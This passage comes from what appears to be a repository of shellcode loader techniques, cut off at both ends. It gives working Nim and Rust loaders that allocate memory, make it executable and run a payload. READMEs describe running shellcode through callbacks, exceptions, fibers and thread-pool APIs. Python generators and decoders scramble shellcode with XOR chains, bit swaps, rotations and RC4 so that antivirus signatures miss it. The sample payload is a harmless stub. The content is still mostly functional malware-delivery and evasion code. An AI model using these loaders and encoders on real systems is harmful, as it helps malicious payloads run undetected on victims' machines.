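static void bitswap_buffer(uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 1 < len; i += 2)
        bitswap_pair(&buf[i], &buf[i + 1]);
}

/* Self-test; returns 1 if the swap behaves as the README's formulas state. */
static int bitswap_selftest(void)
{
    uint8_t l = 0xFF, r = 0x00;
    bitswap_pair(&l, &r);                 /* all of L's slice moves to R and vice versa */
    if (l != 0xE1 || r != 0x1E) return 0;

    /* the archive's 4-byte stub: pair (CC, C3) becomes (C2, CD), pair (90, 90) is unchanged */
    uint8_t stub[4] = { 0x90, 0x90, 0xCC, 0xC3 };
    const uint8_t enc[4] = { 0x90, 0x90, 0xC2, 0xCD };
    bitswap_buffer(stub, 4);
    if (memcmp(stub, enc, 4) != 0) return 0;
    bitswap_buffer(stub, 4);              /* second application decodes */
    if (memcmp(stub, "\x90\x90\xCC\xC3", 4) != 0) return 0;

    /* generalised slice: N=3 bits at P=2 gives mask 0x1C and is also an involution */
    uint8_t a = 0xA5, b = 0x3C, a0 = a, b0 = b;
    bitswap_pair_np(&a, &b, 2, 3);
    bitswap_pair_np(&a, &b, 2, 3);
    return a == a0 && b == b0;
}
```

Since the transform is its own inverse, a loader that applies it while copying the shellcode into the target buffer needs no separate key or decode table; the cost is that the mapping is fixed and trivially recognisable once known.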
The algorithm as applied here exchanges the 4-bit slice at bit positions 1 through 4 (counting from bit 0), which is the slice that the masks `0x1E` / `0xE1` select:

```
extract(X) = X & 0x1E
clear(X)   = X & 0xE1

L' = clear(L) | extract(R)
R' = clear(R) | extract(L)
```

Because the swap only moves bits between the two slices, applying the same step again restores `L` and `R`: encoder and decoder are identical.
--------------------------------------------------------------------------------
/windows/execution/exception/AddVectoredExceptionHandler/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing exception to run the shellcode.

### Overview

Execute shellcode through an exception handler registered with `AddVectoredExceptionHandler` and triggered with `RaiseException`. The handler receives the `EXCEPTION_POINTERS` of the raised exception; it can call the shellcode directly or redirect execution by rewriting the instruction pointer in `ContextRecord` and returning `EXCEPTION_CONTINUE_EXECUTION`. `RemoveVectoredExceptionHandler` unregisters the handler afterwards.

```c++
PVOID AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);

void RaiseException (DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments);

ULONG RemoveVectoredExceptionHandler (PVOID Handle);
```

### Reference

- [MSDN AddVectoredExceptionHandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler)
- [MSDN RaiseException](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-raiseexception)
- [MSDN RemoveVectoredExceptionHandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-removevectoredexceptionhandler)
--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `CreateRemoteThread` and wait for completion with `WaitForSingleObject`.
`CreateRemoteThread` is normally used to start a thread in a remote process, but the new thread can also run in the loader's own process by passing `GetCurrentProcess()` as `hProcess`.

```c++
HANDLE CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateRemoteThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
/windows/writing/encryption/stream/rc4/SystemFunction/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption

### Overview

RC4 encryption with `SystemFunction032` or `SystemFunction033`, internal (undocumented) APIs exported by advapi32.

`SystemFunction032` is nominally the encryption routine and `SystemFunction033` the decryption routine, but internally both resolve to the same code. Since RC4 is a symmetric stream cipher, either function both encrypts and decrypts with the same key.
```c++
NTSTATUS SystemFunction032 (struct ustring* data, struct ustring* key);

NTSTATUS SystemFunction033 (struct ustring* data, struct ustring* key);

typedef struct
{
    DWORD Length;
    DWORD MaximumLength;
    PVOID Buffer;
} ustring;
```

### Reference

- [WineAPI SystemFunction032](https://source.winehq.org/WineAPI/SystemFunction032.html)
- [ReactOS SystemFunction032](https://doxygen.reactos.org/df/d13/sysfunc_8c.html#a66d55017b8625d505bd6c5707bdb9725)
--------------------------------------------------------------------------------
/windows/execution/invoke/nim/code.nim:
--------------------------------------------------------------------------------
#[
    Shellcode Loader
    Archive of Reversing.ID

    Executing shellcode by jumping to it.

    Compile:
    $ nim c code.nim

    Technique:
    - allocation: VirtualAlloc
    - writing: copyMem
    - permission: VirtualProtect
    - execution: invoke directly (call through a proc pointer)
]#
import winim

when isMainModule:
  var old_protect: DWORD = 0

  # shellcode storage in stack
  var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]

  # allocate memory buffer for payload as READ-WRITE (no executable)
  var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)

  # copy payload to the buffer
  copyMem(runtime, unsafeAddr payload, payload.len)

  # make buffer executable (R-X)
  var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect)
  if retval != 0:
    # reinterpret the buffer as a parameterless proc and call it
    let f = cast[proc(){.nimcall.}](runtime)
    f()

  # MEM_RELEASE requires dwSize to be 0
  VirtualFree(runtime, 0, MEM_RELEASE)
--------------------------------------------------------------------------------
/windows/writing/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `writing` techniques are the methods used to transform the stored shellcode. Shellcode stored in plain form is very likely to be detected, so it is scrambled to disguise it. To get the shellcode back, the inverse transformation is applied before or while writing the shellcode into the target region.

`writing` techniques fall into several categories by characteristic:

- [compression](compression): compress the shellcode to reduce its size.
- [conversion](conversion): change the representation of the shellcode into a common encoding.
- [copy](copy): copy the shellcode with various functions, without any additional transformation.
- [custom](custom): unique techniques outside the existing categories.
- [encryption](encryption): encrypt the shellcode with a symmetric or asymmetric algorithm.
- [permutation](permutation): reorder bytes according to a semi-random rule.
- [substitution](substitution): replace bytes according to a mapping.
--------------------------------------------------------------------------------
/linux/execution/callback/fts_open/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `fts_open` and `fts_read` (glibc).

`fts_open` and `fts_read` belong to the FTS (File Tree Scan) library, designed for traversing file hierarchies. The library is not part of standard libc but is implemented on many UNIX-like operating systems.

FTS is an abstraction layer over recursive `opendir` and `readdir` for walking a tree. The callback is the comparator used to sort directory entries, and the shellcode address is passed in its place.
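An added example (my own code, not the repository's loader) that shows when the FTS comparator actually fires. It creates a temporary directory with three files, passes an ordinary C function in the position where a loader would pass its shellcode address, and counts invocations: none happen inside `fts_open` for a single root path, and several happen inside `fts_read` when the directory's children are sorted. glibc on Linux is assumed (the page's target); the directory name and file names are constructed for the test.

```c
/* Added example (not repository code): observing the fts comparator callback. */
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fts.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static int compar_calls;

/* stands in for the shellcode: same prototype as the fts comparator */
static int payload_stub(const FTSENT **a, const FTSENT **b)
{
    compar_calls++;
    return strcmp((*a)->fts_name, (*b)->fts_name);
}

/* Builds a temp directory with three files, walks it, cleans up. Returns the
 * number of comparator calls seen during fts_read, or -1 on error (including
 * the case where fts_open itself already invoked the comparator). */
static int fts_callback_demo(void)
{
    char dir[] = "/tmp/fts-demo-XXXXXX";           /* constructed path template */
    if (mkdtemp(dir) == NULL) return -1;

    const char *names[] = { "a.bin", "b.bin", "c.bin" };
    char path[3][64];
    for (int i = 0; i < 3; i++) {
        snprintf(path[i], sizeof path[i], "%s/%s", dir, names[i]);
        int fd = open(path[i], O_WRONLY | O_CREAT, 0600);
        if (fd < 0) return -1;
        close(fd);
    }

    compar_calls = 0;
    char *const argv[] = { dir, NULL };

    /* single root path: fts_open does not sort anything, so no callback yet */
    FTS *fts = fts_open(argv, FTS_NOCHDIR | FTS_PHYSICAL, payload_stub);
    if (fts == NULL) return -1;
    int calls_before_read = compar_calls;

    /* the comparator runs inside fts_read when the directory's children
     * (three entries here, so at least two comparisons) are sorted */
    while (fts_read(fts) != NULL)
        ;
    fts_close(fts);

    for (int i = 0; i < 3; i++) unlink(path[i]);
    rmdir(dir);

    return calls_before_read == 0 ? compar_calls : -1;
}
```

Two consequences for a loader built on this API: the callback does not run until `fts_read` is actually called, and it does not run at all for a directory with fewer than two entries, because there is nothing to sort.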
```c++
#include <sys/types.h>
#include <sys/stat.h>
#include <fts.h>

typedef int (*callback_t)(const FTSENT **, const FTSENT **);

FTS * fts_open (char * const * path_argv, int options, callback_t comparator);
```

Although the comparator is handed to `fts_open`, with a single root path it is not invoked there; it runs when `fts_read` builds a directory's child list, and only if that directory has at least two entries to sort.

### Reference

- [Man 3 fts_open](https://linux.die.net/man/3/fts_open)
- [Man 3 fts_read](https://linux.die.net/man/3/fts_read)
--------------------------------------------------------------------------------
/windows/execution/callback/MappingRecognizeText/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `MappingRecognizeText` (ELS, elscore). A text-recognition service is obtained with `MappingGetServices`, and the shellcode address is placed in the `pfnRecognizeCallback` member of the `MAPPING_OPTIONS` structure passed as `pOptions`, which is why that structure is referenced below. `MappingFreeServices` releases the service list.

```c++
HRESULT MappingRecognizeText (PMAPPING_SERVICE_INFO pServiceInfo, LPCWSTR pszText, DWORD dwLength, DWORD dwIndex, PMAPPING_OPTIONS pOptions, PMAPPING_PROPERTY_BAG pbag);

HRESULT MappingGetServices (PMAPPING_ENUM_OPTIONS pOptions, PMAPPING_SERVICE_INFO *prgServices, DWORD *pdwServicesCount);

HRESULT MappingFreeServices (PMAPPING_SERVICE_INFO pServiceInfo);
```

### Reference

- [MSDN MappingRecognizeText](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingrecognizetext)
- [MSDN MappingGetServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappinggetservices)
- [MSDN MappingFreeServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingfreeservices)
- [MSDN structure MAPPING_OPTIONS](https://docs.microsoft.com/en-us/windows/win32/api/elscore/ns-elscore-mapping_options)
--------------------------------------------------------------------------------
/windows/execution/fiber/RtlUserFiberStart/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Execute shellcode with `RtlUserFiberStart`.

`RtlUserFiberStart` is an undocumented, low-level ntdll function. It takes no parameters: it is the routine a new fiber starts in, and it reads the fiber's start address from the current fiber record referenced by the TEB (`NtTib.FiberData`). That is why the references below are about the TEB and `NT_TIB` rather than about the function itself.

```c++
NTSTATUS RtlUserFiberStart ();
```

### Reference

- [MSDN TEB (Thread Environment Block)](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-teb)
- [TEB](https://processhacker.sourceforge.io/doc/struct___t_e_b.html)
- [TEB32](https://processhacker.sourceforge.io/doc/struct___t_e_b32.html)
- [Wiki Thread Information Block](https://en.wikipedia.org/wiki/Win32_Thread_Information_Block)
- [NT_TIB](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20|%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB)
- [NT_TIB32](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB32)
- [MSDN NtCurrentTeb](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-ntcurrentteb)
--------------------------------------------------------------------------------
/windows/execution/callback/ReadFileEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `ReadFileEx`. The completion routine (`LPOVERLAPPED_COMPLETION_ROUTINE`) is the shellcode address. The file must be opened with `FILE_FLAG_OVERLAPPED`, and the completion routine only runs once the asynchronous read has completed and the calling thread enters an alertable wait (for example `SleepEx` with `bAlertable = TRUE`).
The completion routine is queued as an APC and only runs when the calling thread enters an alertable wait (`SleepEx` or `WaitForSingleObjectEx` with `bAlertable = TRUE`); the file handle must have been opened with `FILE_FLAG_OVERLAPPED` and a valid `OVERLAPPED` structure must be supplied.

```c++
BOOL ReadFileEx (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);

HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);

HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
```

### Reference

- [MSDN ReadFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfileex)
- [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)
- [MSDN CreateFileW](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew)
--------------------------------------------------------------------------------
/windows/execution/callback/WriteFileEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `WriteFileEx`.
As with `ReadFileEx`, the completion routine is delivered as an APC and only runs when the thread performs an alertable wait (`SleepEx` or `WaitForSingleObjectEx` with `bAlertable = TRUE`); the handle must be opened with `FILE_FLAG_OVERLAPPED`.

```c++
BOOL WriteFileEx (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);

HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);

HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
```

### Reference

- [MSDN WriteFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefileex)
- [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)
- [MSDN CreateFileW](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew)
--------------------------------------------------------------------------------
/windows/allocation/RtlAllocateHeap/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation using `RtlAllocateHeap`, but on a separate heap created with `RtlCreateHeap` rather than the process default heap.
Heap pages are not executable by default: either create the heap with the `HEAP_CREATE_ENABLE_EXECUTE` flag or change the protection of the allocated block before jumping into it. `RtlDestroyHeap` tears down the whole heap, including blocks that were never released with `RtlFreeHeap`.

```c++
PVOID RtlAllocateHeap (PVOID HeapHandle, ULONG Flags, SIZE_T Size);

PVOID RtlCreateHeap (ULONG Flags, PVOID HeapBase, SIZE_T ReserveSize, SIZE_T CommitSize, PVOID Lock, PRTL_HEAP_PARAMETERS Parameters);

LOGICAL RtlFreeHeap (PVOID HeapHandle, ULONG Flags, PVOID BaseAddress);

PVOID RtlDestroyHeap (PVOID HeapHandle);
```

### Reference

- [MSDN RtlAllocateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlallocateheap)
- [MSDN RtlCreateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcreateheap)
- [MSDN RtlFreeHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlfreeheap)
- [MSDN RtlDestroyHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtldestroyheap)
--------------------------------------------------------------------------------
/windows/storage/stack/nim/code.nim:
--------------------------------------------------------------------------------
#[
    Shellcode Loader
    Archive of Reversing.ID

    storing payload in stack

    Compile:
    $ nim c code.nim

    Technique:
    - allocation: VirtualAlloc
    - permission: VirtualProtect
    - execution: CreateThread
]#
import winim

when isMainModule:
    var old_protect: DWORD = 0

    # shellcode storage in stack (NOP, NOP, INT3, RET)
    var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]

    # allocate memory buffer for payload as READ-WRITE (no executable)
    var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)

    # copy payload to the buffer
    copyMem(runtime, unsafeAddr payload, payload.len)

    # make buffer executable (R-X); never RWX
    var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect)
    if retval != 0:
        var thread = CreateThread(nil, 0,
            cast[LPTHREAD_START_ROUTINE](runtime), nil, 0, nil)
        # block until the payload thread returns
        WaitForSingleObject(thread, INFINITE)
        CloseHandle(thread)

    # dwSize must be 0 when MEM_RELEASE is used
    VirtualFree(runtime, 0, MEM_RELEASE)
--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

Chain `XOR` operations: each byte is XORed with the byte that precedes it.

The technique borrows from the `CBC (Cipher Block Chaining)` mode of operation of block ciphers. In `CBC`, every plaintext block is XORed with the previous ciphertext block before it is encrypted, and the first block is XORed with an `IV (Initialization Vector)`:

```
C[i] = Enc(P[i] ^ C[i - 1], K)
C[0] = Enc(P[0] ^ IV, K)
```

Here the operation is at byte level and there is no cipher at all: each byte is XORed with the previous ciphertext byte. The initial (genesis) key is the first byte of the shellcode, which is left unencoded:

```
C[i] = P[i] ^ C[i - 1]
C[0] = P[0]
```

A variant uses a random byte as the genesis key (the `IV`), so the first shellcode byte is encoded as well:

```
C[i] = P[i] ^ C[i - 1]
C[0] = P[0] ^ K
```

Decoding is the mirror image, `P[i] = C[i] ^ C[i - 1]` (and `P[0] = C[0] ^ K` in the variant). Note that this is an encoding, not encryption: the key byte ships with the blob and anyone holding the ciphertext recovers the plaintext, so it only breaks static byte signatures.
--------------------------------------------------------------------------------
/windows/execution/invoke/rust/with-mmap/src/main.rs:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Storing payload in stack.

    Compile:
    $ cargo build

    Technique:
    - allocation: MemoryMap::new (readable, writable and executable at once, i.e. RWX)
    - permission: set at allocation time, no separate protection change
    - execution: unsafe call to function pointer

    Note:
    - minimalistic code
    - the mapping is RWX, which is the easiest pattern for memory scanners to flag

    Dependencies:
    - mmap==0.1.0 -> allocate executable section
*/

extern crate mmap;

use std::{mem, ptr};
use mmap::{MapOption, MemoryMap};

fn main() {
    let opts = [
        MapOption::MapReadable,
        MapOption::MapWritable,
        MapOption::MapExecutable
    ];

    // shellcode storage in stack (NOP, NOP, INT3, RET)
    let payload: [u8; 4] = [0x90, 0x90, 0xCC, 0xC3];

    // allocate a memory buffer for payload
    let runtime = MemoryMap::new(payload.len(), &opts).unwrap();

    unsafe {
        // copy payload to the buffer
        ptr::copy(payload.as_ptr(), runtime.data(), payload.len());

        // execute the buffer as a function
        mem::transmute::<_, fn()>(runtime.data())();
    }
}
--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

# make sure n is 0 < n < 8
rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)

# bits 1..4 of a byte are exchanged between the two bytes of a pair
extract = lambda X: X & 0x1E
clear = lambda X: X & 0xE1

cross = lambda L,R: (clear(L) | extract(R), clear(R) | extract(L))


with open("shellcode.bin", "rb") as f:
    shcode = f.read()
shlen = len(shcode)

# make sure shellcode is even-length (pad with NOP)
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen += 1

# generate single byte key
key = random.randrange(1,255)

# encode shellcode; the key is emitted as the first byte
enc_shcode = [key]
idx = 0
while idx < shlen:
    L = shcode[idx]
    R = shcode[idx + 1]

    L, R = cross(L, R)

    # extract the bits and replace
    enc_shcode.append(rotl8(L, 3) ^ key)
    enc_shcode.append(rotr8(R, 3) ^ key)

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
--------------------------------------------------------------------------------
/windows/execution/event/CreateThreadpoolWait/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `CreateThreadpoolWait`.

A thread pool is a set of worker threads that execute callbacks asynchronously.

The callback runs on a pool thread once the handle passed to `SetThreadpoolWait` becomes signaled, so the event is created signaled (or set explicitly) and the main thread has to block, for example with `WaitForSingleObject`; otherwise the process may exit before the pool thread ever runs the payload.

```c++
PTP_WAIT CreateThreadpoolWait(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);

void SetThreadpoolWait(PTP_WAIT pwa, HANDLE h, PFILETIME pftTimeout);

HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwait)
- [MSDN SetThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpoolwait)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
/windows/writing/custom/bit-rotation/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

# make sure n is 0 < n < 8 (byte) and 0 < n < 16 (word)
rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)

rotl16 = lambda x,n: ((x << n) & 0xFFFF) | (x >> (16 - n))
rotr16 = lambda x,n: (x >> n) | ((x << (16 - n)) & 0xFFFF)

make_word = lambda L,R: (L << 8) | R


with open("shellcode.bin", "rb") as f:
    shcode = f.read()
shlen = len(shcode)

# make sure shellcode is even-length (pad with NOP)
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen += 1

# encode shellcode
enc_shcode = []
idx = 0
while idx < shlen:
    L = shcode[idx]
    R = shcode[idx + 1]

    # byte-level rotation
    L = rotl8(L, 3)
    R = rotr8(R, 7)

    # word-level rotation
    W = make_word(L, R)
    W = rotr16(W, 5)

    # split word into bytes (big-endian: high byte first)
    enc_shcode.append((W >> 8) & 0xFF)
    enc_shcode.append(W & 0xFF)

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
--------------------------------------------------------------------------------
/windows/writing/custom/bit-crossover/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

# make sure n is 0 < n < 8
rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)

# the high nibble stays, the low nibbles of a pair are exchanged
high = lambda x: x & 0xF0
low = lambda x: x & 0x0F

cross = lambda L,R: (high(L) | low(R), high(R) | low(L))


with open("shellcode.bin", "rb") as f:
    shcode = f.read()
shlen = len(shcode)

# generate single byte key
key = random.randrange(1,255)

# make sure shellcode is even-length (pad with NOP)
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen += 1

# encode shellcode; the key is emitted as the first byte
enc_shcode = [key]
idx = 0
while idx < shlen:
    L = shcode[idx    ]     # LEFT
    R = shcode[idx + 1]     # RIGHT

    # get half of each byte and cross
    L, R = cross(L, R)

    # rotate then XOR
    enc_shcode.append(rotl8(L, 3) ^ key)
    enc_shcode.append(rotr8(R, 3) ^ key)

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
--------------------------------------------------------------------------------
/windows/execution/event/CreateThreadpoolTimer/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode using timer.

### Overview

Execute shellcode with `CreateThreadpoolTimer`.

A thread pool is a set of worker threads that execute callbacks asynchronously.

The callback fires on a pool thread when the due time given to `SetThreadpoolTimer` elapses; a negative `FILETIME` is relative to the current time and `msPeriod = 0` makes the timer one-shot. As with the wait variant, the main thread must block (here on an event with `WaitForSingleObject`) long enough for the timer to fire.

```c++
PTP_TIMER CreateThreadpoolTimer(PTP_TIMER_CALLBACK pfnti, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);

void SetThreadpoolTimer(PTP_TIMER pti, PFILETIME pftDueTime, DWORD msPeriod, DWORD msWindowLength);

HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpooltimer)
- [MSDN SetThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpooltimer)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
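The `generate.py` scripts above (bit-swap, bit-rotation, bit-crossover) and the xor-chain README only show the encoder side. The following is an added example, not code from the Reversing.ID archive, giving the decoders a loader would need for all four custom transforms, each paired with a compact restatement of its encoder so the round trip can be checked offline. Function names and the sample payload are this example's own; the constants (rotation amounts, masks, the leading key byte) are those used by the page's generators.

```python
# Added example (not part of the archive): decode side of the custom
# "writing" transforms on this page, with matching encoders for a round trip.
import random

# rotate within 8 / 16 bits; n must satisfy 0 < n < width
rotl8  = lambda x, n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8  = lambda x, n: (x >> n) | ((x << (8 - n)) & 0xFF)
rotl16 = lambda x, n: ((x << n) & 0xFFFF) | (x >> (16 - n))
rotr16 = lambda x, n: (x >> n) | ((x << (16 - n)) & 0xFFFF)

# nibble crossover (bit-crossover) and bits 1..4 crossover (bit-swap).
# Both masks are complementary, so each crossover is its own inverse.
cross_nibble = lambda L, R: ((L & 0xF0) | (R & 0x0F), (R & 0xF0) | (L & 0x0F))
cross_bits   = lambda L, R: ((L & 0xE1) | (R & 0x1E), (R & 0xE1) | (L & 0x1E))

def pad_even(data):
    """The pair-based encoders pad an odd-length payload with one NOP."""
    return data + b"\x90" if len(data) % 2 else data

# --- xor-chain: C[i] = P[i] ^ C[i-1], C[0] = P[0] ^ iv (iv = 0 is the plain variant)
def xor_chain_encode(data, iv=0):
    out, prev = [], iv
    for p in data:
        prev = p ^ prev
        out.append(prev)
    return bytes(out)

def xor_chain_decode(enc, iv=0):
    out, prev = [], iv
    for c in enc:
        out.append(c ^ prev)   # P[i] = C[i] ^ C[i-1]
        prev = c
    return bytes(out)

# --- bit-rotation: rotate both bytes, join to a word, rotate the word
def bit_rotation_encode(data):
    data, out = pad_even(data), []
    for i in range(0, len(data), 2):
        W = rotr16((rotl8(data[i], 3) << 8) | rotr8(data[i + 1], 7), 5)
        out += [W >> 8, W & 0xFF]
    return bytes(out)

def bit_rotation_decode(enc):
    out = []
    for i in range(0, len(enc), 2):
        W = rotl16((enc[i] << 8) | enc[i + 1], 5)        # undo the word rotation first
        out += [rotr8(W >> 8, 3), rotl8(W & 0xFF, 7)]    # then undo the byte rotations
    return bytes(out)

# --- bit-crossover / bit-swap: cross, rotate, XOR; the key byte is stored first
def crossed_encode(data, key, cross):
    data, out = pad_even(data), [key]
    for i in range(0, len(data), 2):
        L, R = cross(data[i], data[i + 1])
        out += [rotl8(L, 3) ^ key, rotr8(R, 3) ^ key]
    return bytes(out)

def crossed_decode(enc, cross):
    key, out = enc[0], []
    for i in range(1, len(enc), 2):
        L = rotr8(enc[i] ^ key, 3)        # undo XOR, then the rotation
        R = rotl8(enc[i + 1] ^ key, 3)
        out += cross(L, R)                # crossover is an involution
    return bytes(out)

bit_crossover_decode = lambda enc: crossed_decode(enc, cross_nibble)
bit_swap_decode      = lambda enc: crossed_decode(enc, cross_bits)

if __name__ == "__main__":
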